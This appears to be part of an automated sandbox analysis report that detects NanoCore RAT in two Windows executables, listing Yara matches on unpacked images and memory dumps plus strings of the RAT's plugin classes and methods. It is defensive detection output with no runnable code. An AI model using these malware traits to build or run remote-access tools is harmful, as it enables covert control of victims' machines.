Source: Yara match	File source: 4.2.rstmgknbahw.exe.2510000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.3950e14.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.4980000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.3950e14.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.4940000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.1.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.415058.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.638d50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.394bfde.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.415058.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rstmgknbahw.exe.2311458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.24e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.415058.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.INQUIRY.exe.22e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.INQUIRY.exe.22f1458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.39a98c0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.2510000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.395543d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.415058.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.39adee9.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.6d8d50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rstmgknbahw.exe.2411458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.381bfde.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.24e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.782558.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.INQUIRY.exe.22f1458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rstmgknbahw.exe.2400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.38d3258.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.39a98c0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.782558.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.38d3258.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.3820e14.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.2520000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.INQUIRY.exe.22e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.4940000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.37a3258.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rstmgknbahw.exe.2300000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rstmgknbahw.exe.2400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.638d50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.725196610.000000000390A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.735022366.00000000037DA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.734386129.0000000000625000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.663644960.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.718272419.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.702725030.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.918797240.00000000039A2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: INQUIRY.exe PID: 6904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: INQUIRY.exe PID: 7084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rstmgknbahw.exe PID: 1904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rstmgknbahw.exe PID: 5320, type: MEMORYSTR

Remote Access Functionality

Detected Nanocore Rat

Source: INQUIRY.exe, 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: INQUIRY.exe, 00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: INQUIRY.exe, 00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: INQUIRY.exe, 00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: INQUIRY.exe, 00000002.00000002.918484295.0000000002911000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: INQUIRY.exe, 00000002.00000002.918484295.0000000002911000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: INQUIRY.exe, 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: INQUIRY.exe, 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: INQUIRY.exe, 00000002.00000002.918797240.00000000039A2000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: rstmgknbahw.exe	String found in binary or memory: NanoCore.ClientPluginHost
Source: rstmgknbahw.exe, 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: rstmgknbahw.exe, 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: rstmgknbahw.exe, 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: rstmgknbahw.exe, 00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: rstmgknbahw.exe, 00000004.00000002.725196610.000000000390A000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: rstmgknbahw.exe, 00000004.00000002.725196610.000000000390A000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: rstmgknbahw.exe, 00000004.00000002.725133013.00000000028DE000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: rstmgknbahw.exe, 00000004.00000002.725133013.00000000028DE000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: rstmgknbahw.exe, 00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: rstmgknbahw.exe, 00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: rstmgknbahw.exe, 00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: rstmgknbahw.exe	String found in binary or memory: NanoCore.ClientPluginHost
Source: rstmgknbahw.exe, 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: rstmgknbahw.exe, 00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: rstmgknbahw.exe, 00000006.00000002.734941801.00000000027AE000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: rstmgknbahw.exe, 00000006.00000002.734941801.00000000027AE000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: rstmgknbahw.exe, 00000006.00000002.735022366.00000000037DA000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: rstmgknbahw.exe, 00000006.00000002.735022366.00000000037DA000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: rstmgknbahw.exe, 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: rstmgknbahw.exe, 00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: rstmgknbahw.exe, 00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost

Yara detected Nanocore RAT

Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.37a3258.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rstmgknbahw.exe.2411458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.3820e14.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.6d8d50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rstmgknbahw.exe.2300000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.382543d.7.raw.unpack, type: UNPACKEDPE
